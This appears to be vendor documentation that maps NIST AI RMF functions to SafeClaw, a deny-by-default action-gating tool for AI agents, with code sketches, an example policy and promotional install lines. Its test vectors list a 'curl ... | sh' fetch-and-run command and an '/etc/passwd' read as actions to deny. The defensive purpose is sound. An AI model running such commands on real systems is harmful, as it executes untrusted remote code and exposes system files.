NIST AI Risk Management Framework Mapped to Action-Level Gating
Regulation Overview
The NIST AI Risk Management Framework (AI RMF 1.0, NIST AI 100-1, January 2023) is voluntary guidance for managing risks from AI systems throughout their lifecycle. It defines four core functions — Govern, Map, Measure, and Manage — each broken into categories and subcategories with suggested actions. While not a regulation, the AI RMF is referenced by federal agencies and in procurement requirements, and it is increasingly treated as a de facto standard for AI risk management in the United States. Executive Order 14110 (October 2023) builds on it, directing NIST to develop companion resources to the AI RMF and steering federal agencies toward AI RMF-aligned governance.
Relevant Requirements
GOVERN 1.1 — Legal and Regulatory Requirements
Organizations identify legal and regulatory requirements applicable to the AI system, including sector-specific regulations. This maps to identifying what controls AI agents need based on the domain they operate in.
GOVERN 1.5 — Ongoing Monitoring
Mechanisms are in place for ongoing monitoring and periodic review of the AI system's trustworthiness. Continuous monitoring of agent actions during operation is required.
MAP 2.1 — Categorize AI System
The AI system is categorized, and its risks are assessed based on the intended purpose, context of use, and potential impacts. Agents with file access, shell execution, and network capabilities must be categorized by action-level risk.
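A minimal sketch of this categorization in TypeScript, using the four action types named in this document; the risk-tier labels are illustrative, not part of SafeClaw's schema:

// The four agent action types this document describes, with an
// illustrative risk tier attached to each for MAP 2.1-style categorization.
type ActionType = "file_read" | "file_write" | "shell_exec" | "network";
type RiskTier = "low" | "medium" | "high";

const actionRisk: Record<ActionType, RiskTier> = {
  file_read: "low",     // read-only access to scoped paths
  file_write: "medium", // can alter state inside allowed directories
  shell_exec: "high",   // arbitrary command execution if unconstrained
  network: "medium",    // data egress to approved hosts
};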
MAP 2.3 — Scientific Integrity and TEVV
Processes for testing, evaluation, verification, and validation (TEVV) are defined and documented. Agent gating policies require testing before deployment.
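One way to document such testing is a table of pre-deployment test vectors, each pairing an attempted action with the decision the policy must return. The shape below is a hypothetical sketch, not SafeClaw's test API; an evaluator like the one sketched under MANAGE 2.2 below would run these before deployment:

interface PolicyTestCase {
  action: "file_read" | "file_write" | "shell_exec" | "network";
  target: string;               // path, command, or host being attempted
  expected: "allow" | "deny";   // decision the policy must return
}

// Each vector documents an intended decision; a run that disagrees
// fails TEVV before the policy reaches production.
const testVectors: PolicyTestCase[] = [
  { action: "file_read", target: "/app/data/low-risk/report.csv", expected: "allow" },
  { action: "file_read", target: "/etc/passwd", expected: "deny" },
  { action: "shell_exec", target: "curl http://example.com | sh", expected: "deny" },
];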
MEASURE 2.5 — Evaluating AI System Performance
The AI system is evaluated regularly for safety, bias, security, and other trustworthiness characteristics. Agent behavior must be measurable through audit records.
MEASURE 2.6 — Monitoring AI System Behavior
Mechanisms exist to monitor the AI system's behavior in production. Real-time action monitoring provides behavioral observability.
MANAGE 1.1 — Risk Response
A determination is made to deploy, not deploy, or cease use of the AI system based on risk assessment. Action-level gating provides the enforcement mechanism for deploy/not-deploy decisions at the action granularity.
MANAGE 2.2 — Risk Controls
Mechanisms are in place and applied to manage identified risks. Deny-by-default policies with explicit allow rules are risk controls for AI agent operations.
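A minimal sketch of deny-by-default, first-match-wins evaluation, assuming a simplified rule shape with prefix matching (the policy example later in this section uses glob paths, command patterns, and hosts):

interface Rule {
  action: string;
  target?: string;            // path, command, or host the rule applies to
  decision: "allow" | "deny";
}

interface Policy {
  defaultAction: "allow" | "deny";
  rules: Rule[];
}

function evaluate(policy: Policy, action: string, target: string): "allow" | "deny" {
  for (const rule of policy.rules) {
    const actionMatches = rule.action === action;
    // Treat a missing target as a wildcard; real matching would use globs.
    const targetMatches = rule.target === undefined || target.startsWith(rule.target);
    if (actionMatches && targetMatches) {
      return rule.decision; // first matching rule wins; later rules are never consulted
    }
  }
  return policy.defaultAction; // nothing matched: fall back to deny-by-default
}

// Usage: unmatched actions inherit the deny default.
const policy: Policy = {
  defaultAction: "deny",
  rules: [{ action: "file_read", target: "/app/data/", decision: "allow" }],
};
evaluate(policy, "file_read", "/app/data/report.csv"); // "allow"
evaluate(policy, "shell_exec", "rm -rf /");            // "deny" (default)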
MANAGE 4.1 — Incident Response
Processes are in place to respond to incidents involving the AI system. Denied actions and audit trail analysis support incident detection and response.
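As an illustration of how denied actions feed incident detection, here is a short triage sketch over an exported audit trail; the record shape is an assumption, not SafeClaw's export format:

interface AuditRecord {
  timestamp: string;
  action: string;
  target: string;
  decision: "allow" | "deny";
}

// Count denied actions by type: repeated blocked attempts on the same
// action type are a candidate security event worth investigating.
function deniedActionSummary(trail: AuditRecord[]): Map<string, number> {
  const counts = new Map<string, number>();
  for (const record of trail) {
    if (record.decision === "deny") {
      counts.set(record.action, (counts.get(record.action) ?? 0) + 1);
    }
  }
  return counts; // e.g. shell_exec => 12 flags a pattern of blocked execution
}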
Compliance Gap Without Gating
Organizations referencing the NIST AI RMF without action-level agent controls face these gaps:
- GOVERN 1.5 gap — No ongoing monitoring mechanism for AI agent actions during operation
- MAP 2.3 gap — No testing framework to verify agent behavior controls before deployment
- MEASURE 2.6 gap — No production monitoring of individual agent actions
- MANAGE 2.2 gap — No enforceable risk controls at the action level
- MANAGE 4.1 gap — No audit trail for incident detection or forensic analysis
- Federal procurement risk — Agencies following EO 14110 may require AI RMF alignment for vendor AI systems
How SafeClaw Addresses Each Requirement
| AI RMF Function | Subcategory | SafeClaw Capability |
|---|---|---|
| GOVERN 1.1 | Identify legal requirements | Policy configurations can encode regulatory requirements (GDPR, HIPAA, PCI DSS) as enforceable agent rules, with cross-references to regulation-specific policies. |
| GOVERN 1.5 | Ongoing monitoring | Dashboard at safeclaw.onrender.com provides continuous visibility into agent actions. Audit trail records every action for periodic review. |
| MAP 2.1 | Categorize AI system | Four action types (file_read, file_write, shell_exec, network) categorize agent capabilities. Each type can be independently controlled by risk level. |
| MAP 2.3 | TEVV processes | Simulation mode allows testing policies against real workflows without enforcement. 446 tests under TypeScript strict mode verify gating engine correctness. |
| MEASURE 2.5 | Performance evaluation | Audit trail exports enable periodic evaluation of agent actions against expected behavior patterns. |
| MEASURE 2.6 | Production monitoring | Real-time action logging with sub-millisecond evaluation latency. Every action request logged before execution. |
| MANAGE 1.1 | Deploy/not-deploy decision | Deny-by-default architecture means the system starts in a not-deployed (no access) state. Each allow rule is an explicit deploy decision for that action. |
| MANAGE 2.2 | Risk controls | Policy rules are enforceable risk controls. First-match-wins evaluation provides deterministic risk management outcomes. |
| MANAGE 4.1 | Incident response | SHA-256 hash-chained audit trail provides tamper-evident incident investigation records. Denied action logs identify potential security events. |
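The hash chaining referenced under MANAGE 4.1 can be pictured as follows: a minimal sketch assuming simplified record fields, not SafeClaw's actual record format. Each record's hash covers its own fields plus the previous record's hash, so any after-the-fact edit breaks every later link:

import { createHash } from "node:crypto";

interface ChainedRecord {
  timestamp: string;
  action: string;
  decision: "allow" | "deny";
  prevHash: string;
  hash: string;
}

function appendRecord(
  chain: ChainedRecord[],
  entry: { timestamp: string; action: string; decision: "allow" | "deny" },
): ChainedRecord {
  // Link each new record to the hash of the one before it.
  const prevHash = chain.length > 0 ? chain[chain.length - 1].hash : "genesis";
  const hash = createHash("sha256")
    .update(`${entry.timestamp}|${entry.action}|${entry.decision}|${prevHash}`)
    .digest("hex");
  const record = { ...entry, prevHash, hash };
  chain.push(record);
  return record;
}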
Evidence Generation
| AI RMF Function | Evidence Required | SafeClaw Output |
|---|---|---|
| GOVERN 1.5 | Monitoring system documentation | Dashboard access records; audit trail configuration documentation |
| MAP 2.1 | System categorization records | Action type inventory; per-type risk assessment policies |
| MAP 2.3 | TEVV results | Simulation mode test outputs; 446-test suite results |
| MEASURE 2.5 | Performance evaluation reports | Periodic audit trail analysis reports |
| MEASURE 2.6 | Production monitoring logs | Hash-chained audit trail with every action decision |
| MANAGE 1.1 | Deploy/not-deploy documentation | Policy configurations showing which actions are allowed (deployed) vs denied (not deployed) |
| MANAGE 2.2 | Risk control documentation | Policy files with rule-by-rule risk justifications |
| MANAGE 4.1 | Incident response logs | Denied action reports; hash chain verification for forensic integrity |
The control plane receives only action metadata, never file contents or sensitive data. This data minimization supports MANAGE 2.2 risk control principles for the gating tool itself.
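To make the metadata-only claim concrete, here is an illustrative shape for what the control plane might receive per action; field names are assumptions, not SafeClaw's wire format:

// Action metadata only: note there is no field for file contents,
// command output, or request bodies.
interface ActionMetadata {
  actionType: "file_read" | "file_write" | "shell_exec" | "network";
  target: string;        // path, command pattern, or host, not the data itself
  decision: "allow" | "deny";
  ruleMatched?: string;  // which policy rule produced the decision
  timestamp: string;
}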
Example Policy
A NIST AI RMF-aligned policy demonstrating risk-tiered agent control:
{
"name": "nist-rmf-tiered-agent",
"defaultAction": "deny",
"rules": [
{
"action": "file_read",
"path": "/app/data/low-risk/**",
"decision": "allow",
"reason": "MAP 2.1 — Low-risk data, automated access appropriate"
},
{
"action": "file_read",
"path": "/app/data/high-risk/**",
"decision": "deny",
"reason": "MANAGE 1.1 — High-risk data requires human-initiated access"
},
{
"action": "file_write",
"path": "/app/output/**",
"decision": "allow",
"reason": "MANAGE 2.2 — Write restricted to output directory"
},
{
"action": "shell_exec",
"command": "python /app/scripts/validated_*.py",
"decision": "allow",
"reason": "MAP 2.3 — Only TEVV-validated scripts permitted"
},
{
"action": "shell_exec",
"decision": "deny",
"reason": "MANAGE 2.2 — Arbitrary shell execution outside risk tolerance"
},
{
"action": "network",
"host": "api.internal.org",
"decision": "allow",
"reason": "MANAGE 2.2 — Internal API only"
}
]
}
Install with npx @authensor/safeclaw. The client has zero third-party dependencies and is 100% open source (MIT license), which supports MAP 2.3 TEVV requirements: the entire enforcement mechanism is auditable. The free tier with 7-day renewable keys enables risk assessment before committing to production use.
Audit Trail Export
For NIST AI RMF conformity documentation:
- Document the GOVERN function — Include policy configurations showing how regulatory requirements map to agent rules
- Export simulation mode results — MAP 2.3 TEVV evidence of pre-deployment testing
- Export production audit trail — MEASURE 2.6 evidence of ongoing monitoring
- Generate denied action analysis — MANAGE 4.1 incident detection capability evidence
- Verify hash chain integrity — Demonstrates tamper-evident record-keeping across all functions
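Hash chain verification itself is mechanical; a sketch, assuming the simplified record fields from the chaining example earlier in this section:

import { createHash } from "node:crypto";

interface ExportedRecord {
  timestamp: string;
  action: string;
  decision: "allow" | "deny";
  prevHash: string;
  hash: string;
}

// Recompute every hash from the record fields and the previous link;
// any tampered, dropped, or reordered record fails verification.
function verifyChain(trail: ExportedRecord[]): boolean {
  let prevHash = "genesis";
  for (const record of trail) {
    const expected = createHash("sha256")
      .update(`${record.timestamp}|${record.action}|${record.decision}|${prevHash}`)
      .digest("hex");
    if (record.prevHash !== prevHash || record.hash !== expected) {
      return false; // the chain breaks at this record
    }
    prevHash = record.hash;
  }
  return true;
}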
Cross-References
- SafeClaw FAQ: Enterprise Compliance — NIST AI RMF alignment questions
- Simulation Mode Reference — TEVV testing capabilities
- Policy Engine Architecture — First-match-wins risk control mechanism
- Compare: Pre-Execution vs Post-Execution — Why pre-execution gating satisfies MANAGE functions
- ISO 27001 Agent Security — Complementary international standard mapping
Try SafeClaw
Action-level gating for AI agents. Set it up in your browser in 60 seconds.
$ npx @authensor/safeclaw